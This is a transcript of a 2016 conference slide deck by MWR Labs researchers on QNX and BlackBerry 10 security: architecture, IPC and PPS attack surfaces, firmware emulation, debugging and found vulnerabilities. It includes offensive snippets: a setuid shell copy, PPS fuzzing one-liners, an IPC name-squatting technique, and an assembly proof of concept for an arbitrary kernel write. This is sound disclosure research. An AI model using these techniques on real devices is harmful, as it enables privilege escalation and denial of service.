Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 

[CONFidence 2016]: Alex Plaskett, Georgi Geshev - QNX: 99 Problems but a Microkernel ain't one!

  • 1. ++ MWR Labs QNX: 99 Problems but a Microkernel ain’t one! Alex Plaskett and Georgi Geshev 20th May 2016
  • 2. ++ Introduction + Attacking BlackBerry 10 OS + Generic QNX Attack Research + Very Different Architectural Features + Limited Public Security Research + See Appendix + Still Ongoing Research... Introduction
  • 3. MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
  • 4. ++ QNX Architecture Background Westinghouse and Atomic Energy of Canada Limited (AECL) It is hard to imagine an application more critical than a nuclear power plant; failure there can have large scale catastrophic results. Both Westinghouse and AECL chose QNX Neutrino for its uncompromising reliability in complex real-time control systems. http://www.qnx.com/images/logos/ia_customer_logos/IA%20Customer%20Success.doc Air Traffic Control Systems Without reliable ATC systems, planes would be banging into one another like there’s no tomorrow. I’m not at liberty to tell you which airports use QNX-based ATC systems, but there are lots of them, worldwide. http://onqpl.blogspot.com/2008/03/10-qnx-systems-that-could-save-your.html General Electric The Mark VI Turbine Controller is a scalable workhorse control that can be applied to small systems such as an industrial steam turbine control, large gas turbine control systems, and plant controls, and uses QNX to control the precise timing required. Why is QNX security important?
  • 5. ++ QNX Architecture Background QNX Security History (QNX 6.0 – 6.5) Vulnerability Class Memory Corruption Setuid logic bugs Kernel Issues Linker Issues Insecure Permissions Info Leaks
  • 6. ++ QNX Architecture Background + Handful of CVE IDs Assigned to QNX Bugs + QConnDoor, Photon (phrelay, phgrafx) + Although multiple security issues found, possibly internally, and fixed between QNX 6.5 and BB 10 OS. + Source was released at one point 2007 and then closed again. + Dingleberry Playbook root was a backup and restore problem exploited through Samba config. Nothing QNX specific though. + Possible to root some misconfigured older QNX if pdebug is running. QNX Security History (QNX 6.0 – 6.5)
  • 7. ++ QNX Architecture Background + ASLR (QNX 6.5) + Guard Pages, Stack and Heap Cookies, NX, PIE, RELRO + Process Manager Abilities + Photon Windows Manager Removed + No SUID Binaries (BB 10 OS) + Principle of Least Privilege (BB 10 OS) QNX Security Hardening (QNX 6.5 - BB10 OS)
  • 8. ++ QNX Architecture Background + Microkernel OS + Threading, Signalling, Scheduling, Message Passing + No FS, Network Stacks, etc. + Robust IPC Mechanisms + Reduced Kernel Attack Surface + Fault Tolerant QNX Architecture Background
  • 9. ++ QNX Architecture Background + Implemented in Kernel + Synchronous Message Passing + MsgSend(); + MsgReceive(); + MsgReply(); + Blocking QNX Message Passing
  • 10. ++ QNX Architecture Background + Server + ChannelCreate(); / name_attach(); + ChannelDestroy(); + Client + ConnectAttach(); / name_open(); + ConnectDetach(); QNX Message Passing Channels
  • 11. ++ QNX Architecture Background + Process management + Creation, destruction, attributes + Memory management + Memory protection, shared libraries + Pathname management QNX Microkernel and Process Manager (PROCNTO)
  • 12. ++ QNX Architecture Background + spawn(); _PROC_SPAWN + posix_spawn(); _PROC_POSIX_SPAWN + fork(); _PROC_FORK QNX Process Manager
  • 13. ++ QNX Architecture Background QNX Process Manager malloc(); mmap(); MsgSendv(); return msg.o.addr; MsgReceivev(); memmgr_map(); vmm_mmap(); map_create(); pa_alloc(); pte_manipulate(); MsgReplyv(); User Process Process Manager _MEM_MAP
  • 14. ++ QNX Architecture Background QNX Process Manager malloc(); mmap(); MsgSendv(); return msg.o.addr; MsgReceivev(); memmgr_map(); vmm_mmap(); map_create(); pa_alloc(); pte_manipulate(); MsgReplyv(); User Process Process Manager _MEM_MAP
  • 16. ++ QNX Architecture Background + User Space Processes + Path Manager Namespace + Functions of Interest + resmgr_attach(); + io_func_init(); + message_attach(); QNX Resource Managers
  • 17. ++ QNX Architecture Background $ ls -al /pps/services/bluetooth/public/control -rw-rw-rw- 1 pps-bt-media bluetooth 9 Sep 25 06:09 /pps/services/bluetooth/public/control $ echo "msg::lockDevicendat::Backup Interrupted at BBBB” >> /pps/system/navigator/background QNX Persistent Publish Subscribe (PPS)
  • 18. MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
  • 19. ++ Attacking QNX Messaging Attacking QNX Messaging (Endpoints) Client Sandbox Trust Boundary IPC Trust Boundary MsgSend(); Malicious Process Core Component Server Sandbox Trust Boundary
  • 20. ++ Attacking QNX Messaging Attacking QNX Messaging (Endpoints) + /dev/name/[ local | global ]/* name_attach_t * name_attach(dispatch_t *dpp, const char * path, unsigned flags); nrw-rw-rw- 1 root nto 0 Mar 12 12:47 VirtualEventServer nrw-rw-rw- 1 root nto 0 Mar 12 12:47 battmgr nrw-rw-rw- 1 root nto 0 Mar 12 12:47 battmgr_monitor dr-xr-xr-x 2 root nto 0 Mar 12 12:47 csm dr-xr-xr-x 2 root nto 0 Mar 12 12:47 gltracelogger nrw-rw-rw- 1 root nto 0 Mar 12 12:47 led_control nrw-rw-rw- 1 root nto 0 Mar 12 12:47 phone-service nrw-rw-rw- 1 root nto 0 Mar 12 12:47 publisher_channel nrw-rw-rw- 1 root nto 0 Mar 12 12:47 slogger2 nrw-rw-rw- 1 root nto 0 Mar 12 12:47 svga_ch
  • 21. ++ Attacking QNX Messaging + /proc/mount/* + (Node ID, Process ID, Channel ID, Handle, File Type) (Node Id, Process Id, Chan Id) Attacking QNX Messaging (Endpoints) dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,1089563,4,0,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,1282089,1,0,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,2035752,2,8,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,3067978,1,0,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,3076171,1,0,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,5345418,1,0,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,5349515,1,0,11 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,61450,4,0,11 drwxr-xr-x 10 root nto 4096 Mar 12 12:46 0,61450,4,6,0 dr-xr-xr-x 2 root nto 1 Mar 12 12:50 0,8195,1,1,4
  • 22. ++ Attacking QNX Messaging Attacking QNX Messaging (Client Side) int coid; char rmsg[255]; char *smsg = “Fuzz this message”; // Node Descriptor, Process ID, Channel ID coid = ConnectAttach(0, 77, 1, 0, 0); if (MsgSend(coid, smsg, strlen(smsg+1), rmsg, 255) == -1) { exit(EXIT_FAILURE); }
  • 23. ++ Attacking QNX Messaging Attacking QNX Messaging (Server Side) if ((attach = name_attach(NULL, ATTACH_POINT,0) == NULL) { return EXIT_FAILURE; } while (1) { rcvid = MsgReceive(attach->chid, &msg, sizeof(msg),NULL); }
  • 24. MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
  • 25. ++ Attacking QNX PPS + Identify Writable PPS Endpoints for endpoint in $(find /pps –type f); do if [ -w $endpoint ]; then echo $endpoint; fi; done Attacking QNX PPS
  • 26. ++ Attacking QNX PPS + Identify PPS Message Format + Reverse Engineering + QNX Persistent Publish/Subscribe Developer's Guide + Sample Messages + Multitude of Provisioning Shell Scripts Attacking QNX PPS
  • 27. ++ Attacking QNX PPS + Fuzzing PPS messages echo "command::connect_servicendata::D5:DA:8E:43 :ED:68n data2::0x1101:453994D5-D58B-96F9- 6616-B37F586BA2EC" | radamsa >> /pps/services/bluetooth/control Attacking QNX PPS
  • 28. ++ Attacking QNX PPS + Special QNX DOM Object + Exposing Native Components qnx.webplatform.pps.syncWritePPSObject('msg::xyz','/pps/endpoint'); HTML5 WebWorks Applications
  • 29. MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
  • 30. ++ QNX Firmware 1. BB10 Native SDK (GCC, GDB) 2. QNX Trial 6.5 VMWare Image (mkifs, dumpifs) 3. QNX Portal (BSP Images – Beagle Board) 4. Sachesi for Playbook / BB10 QNX Firmware Tools
  • 31. ++ QNX Firmware 1. Sachesi download of updates (BB10 / Playbook) 2. QNX Car Infotainment Updates (Toyota etc.) 3. Extraction of IFS image from live device (/.boot/) 4. Some BSP components from MyQNX website QNX Firmware Acquisition
  • 32. ++ QNX Firmware 1. Beagle - bsp-nto650-ti-omap3530-beagle-1.0.0- 201111030508.zip 2. Locate IFS image (from firmware / BSP) – e.g. ifs-extbox.bin 3. Create NAND image (Combine IFS and bootloader) 1) mknand.sh car.img ifs-extbox.bin 2) nand_ecc car.img 0x0 0xe80000 3) qemu-system-arm -M beagle -m 256 -mtdblock car.img -nographic 4) nand read 0x80100000 0x280000 0x400000; go 0x8010000 == Toyota Extension Box Boot IFS == == Variant:EU-Low HWRev:Gamma Arch:armle-v7 == == built by DMiller on Wed Dec 7 19:45:38 2011 == QNX Booting ARM in QEMU
  • 33. ++ QNX Firmware 1. mkifs and dumpifs is part of the QNX VMware image 2. We have all the necessary binaries from existing firmware extraction 3. Create a minimal .build script (all we really need is BSP startup, kernel and shell binaries). 4. These binaries can be extracted from existing firmware or ported from other BSPs (e.g. startup- omap3530). 5. mkifs -r stage -vv custom.build qnx.ifs 6. Append bootloaders (mknand.sh) 7. Boot with QEMU 8. Integrate code compiled with BB10 toolchain into image by adding reference in .build script QNX Creating Custom ARM Images
  • 34. MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
  • 35. ++ QNX Debugging + Limited shell visibility as devuser + Info leak vulnerability (sysctl –a) + Root simulator / get core dumps (/var/log) / X86 only service launcher start/flags run /bin/sh - cp /bin/ksh /tmp chmod u+s /tmp/ksh QNX Userland Debugging (QCONN)
  • 36. ++ QNX Debugging (gdb) target qnx <device_IP_address>:8000 (gdb) attach <pid> (gdb) file /path/to/app/executable/on/the/host (gdb) set solib-search-path $HOST_QTDIR/lib:$HOST_QTDIR/plugins/xyz/:$BBNDK /target_<version>/qnx6/armle- v7/lib/:$BBNDK/target_<version>/qnx6/ armle-v7/usr/lib (gdb) b main QNX Userland Debugging (GDB)
  • 37. ++ QNX Debugging + Browser Exploitation WebView { id: webView url: http://192.168.0.5:8080 } https://github.com/alexplaskett/QNXSecurity/ blob/master/blackberry_monitor.py QNX Userland Debugging (WebKit)
  • 38. ++ QNX Debugging 1. KDEBUG is the QNX kernel debugger 2. Old source code for this is on sourceforge (http://sourceforge.net/p/monartis/openqnx/ci/master/tree/) 3. Can use BB10 toolchain to build KDEBUG and integrate into BSP image (as previous slide) 4. Allows kernel debugging on X86 QNX 6.* images 5. QNX 8.0, limited to VMWare GDBStub currently and no ARM support: debugStub.listen.guest32 = “true” 6. Allows memory inspection but no breakpoint support 7. Ideally we want to kernel debug on BB10 OS ARM  QNX Kernel Debugging
  • 39. MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
  • 40. ++ QNX Kernel Security + BB10 OS 85 syscalls vs Linux 300 ish QNX Kernel Security Overview (procnto)
  • 41. ++ QNX Kernel Security + User Mappings: 00000000-7fffffff + Kernel Mappings: 80000000-ffffffff + Mapping the null page is protected (EPERM) + No KASLR + Fixed location of certain code / data: ff800000-ffbfffff maps page tables that map 00000000-ffffffff ffff0000-ffff0fff trap vector table for processors with vector adjust fe000000-ff7fffff maps boot programs (kdebug/procnto) ffff1000-ffff1fff cpupage on SMP systems QNX Kernel Memory Layout (BB10 - ARM)
  • 42. ++ QNX Kernel Security LOAD:00042F38 EXPORT ChannelCreate LOAD:00042F38 ChannelCreate ; CODE XREF: j_MsgPause_r+8j LOAD:00042F38 ; j_ld_imposter_exit+8j ... LOAD:00042F38 STMFD SP!, {LR} LOAD:00042F3C MOV R12, #0x23 ; '#' LOAD:00042F40 SVC 0x51 ; 'Q' LOAD:00042F44 LDMFD SP!, {PC} QNX Kernel Syscall (libc.so – kercalls.h)
  • 43. ++ QNX Kernel Security LOAD:FE11B2CC ker_call_table DCD __KER_NOP ; DATA XREF: __ker_entry+80o LOAD:FE11B2CC ; LOAD:off_FE0B66CCo ... LOAD:FE11B2D0 DCD __KER_TRACE_EVENT LOAD:FE11B2D4 DCD __KER_RING0 LOAD:FE11B2D8 DCD __KER_CACHE_FLUSH LOAD:FE11B2DC DCD __KER_SPARE LOAD:FE11B2E0 DCD __KER_SPARE LOAD:FE11B2E4 DCD __KER_SPARE QNX Kernel Syscall Table
  • 44. ++ QNX Kernel Security Int kdecl ker_call_name (THREAD *act, struct kerargs_something * kap) { // Validate ptr’s passed in kap } #define RD_VERIFY_PTR(thp, p, size) if(!WITHIN_BOUNDRY((uintptr_t)(p),(uintptr_t)(p)+(size),(thp)->process- >boundry_addr)) return EFAULT; #define WR_VERIFY_PTR(thp, p, size)if(!WITHIN_BOUNDRY((uintptr_t)(p),(uintptr_t)(p)+(size),(thp)->process- >boundry_addr)) return EFAULT; + Monartis QNX code shows this. Same technique in 8.0 + Created a syscall fuzzer (https://github.com/alexplaskett/QNXSecurity/tree/master/SyscallFuzz) + New syscalls added for BB10 QNX Kernel System Call
  • 45. MWR Labs 1.QNX Architecture Background 2.Attacking QNX Messaging 3.Attacking QNX PPS 4.QNX Firmware 5.QNX Debugging 6.QNX Kernel Security 7.QNX Vulnerabilities Outline
  • 46. ++ QNX Vulnerabilities + Disclaimer: Redacted some unfixed bugs! def send_sync(self,coid,buf,size): ret = self.libc.MsgSend(coid,buf,size,0,0); + Navigation UI Crash + Phone-Service Crash + Z10 Reboot Panics (Watchdog process) + Static reverse engineering to confirm bugs Vulnerabilities - IPC
  • 47. ++ QNX Vulnerabilities + Crash the endpoint then quickly register that name. + Any user can bind within this namespace + libc.name_attach(0,b"phone-service",0) + Allows getting messages destined to that process if process uses name_open again and no check on client id. + Blocks the phone from making outbound calls Vulnerabilities – IPC Squatting
  • 48. ++ QNX Vulnerabilities + Terminates all running applications (as Android application) + Fixed in an upcoming release Vulnerabilities - Navigator PPS $ echo $USER devuser $ echo <redacted> > /pps/system/navigator/control sh: cannot create /pps/system/navigator/control: Permission denied $ ... $ echo $USER apps $ echo <redacted> > /pps/system/navigator/control $ echo $? $ 0
  • 49. ++ QNX Vulnerabilities + QNX 6.5 (2 exploitable bugs / 6 issues identified) + Found perfect bug in Monartis source – does not affect BB10 OS kernel though  + Arbitrary kernel read/write primitive – easily exploitable + Blackberry aware of this and fixed in later versions + Still might be useful for exploiting older QNX systems. + Other outstanding kernel issues in BB10 - I cant disclose currently  Vulnerabilities - Kernel
  • 50. ++ QNX Vulnerabilities ldr ip, [r0] ; ptr to word being tested (no bounds check on R0) teq ip, r1 ; value to compare streq r2, [r0] ; value to set (WRITE HERE) mov r0, ip mrs ip, spsr bicne ip, ip, #ARM_CPSR_Z orreq ip, ip, #ARM_CPSR_Z msr spsr, ip movs pc, lr Vulnerabilities - __emu_cmpxchg
  • 51. ++ QNX Vulnerabilities __asm__( "ldr r0,=0xffff0000n" // Reset vector location "ldr r1,=0xe59ff018n" // Value to compare (what the location in memory was before) "ldr r2,=0x41414141n" // Value to write "ldr ip,=0xff000000n" // To trigger __emu_cmpxchg "swi 0n" : : ); + Demonstrates overwriting the ARM EVT table entries. Vulnerabilities - __emu_cmpxchg
  • 52. ++ QNX Vulnerabilities + Boot BB10 kernel in QEMU (Emulate Qualcomm MSM 8960 BSP?). + Port old KDEBUG to ARM? + Further crash analysis + Improve IFS unpacking / repacking tools + Improve fuzzers + Investigate the Android PRIV for comparison Next Stages
  • 53. ++ MWR Labs + Blackberry responsive to fixing issues + BB10 Core OS fairly high quality / robust against memory corruption exploitation + However, BB just switched to Android (PRIV etc). + Lack of debug visibility makes exploit development challenging + Older versions of QNX contain multiple non-public vulnerabilities + Not too many interesting crashes identified from fuzzing + All the marketing budget spent on security?  Conclusion
  • 54. @mwrlabs - https://labs.mwrinfosecurity.com/system/assets/410/original/mwri_blackberry-10-security_2013-06-03.pdf @esizkur - https://www.youtube.com/watch?v=z5qXhgqw5Gc @quine / @bnull - https://cansecwest.com/slides/2014/NoApologyRequired-BB10-CanSecWest2014.pdf https://speakerdeck.com/quine/voight-kampffing-the-blackberry-playbook-v2 @alexanderantukh - https://www.sec- consult.com/fxdata/seccons/prod/downloads/sec_consult_vulnerability_lab_blackberry_z10_initial_analysis_v10.pdf @juliocesarfort - https://packetstormsecurity.com/files/author/3551/ @timb_machine - http://seclists.org/fulldisclosure/2014/Mar/98 @0xcharlie / @nudehaberdasher - http://illmatics.com/Remote%20Car%20Hacking.pdf Previous Research / Credits
  • 55. MWR Labs + @mwrlabs https://labs.mwrinfosecurity.com/ + Whitepaper available https://labs.mwrinfosecurity.com/publications/qnx- architectural/ + Publishing code shortly: https://github.com/alexplaskett/QNXSecurity Images sourced from: www.qnx.com/download/download/11966/sys_arch.pdf Questions?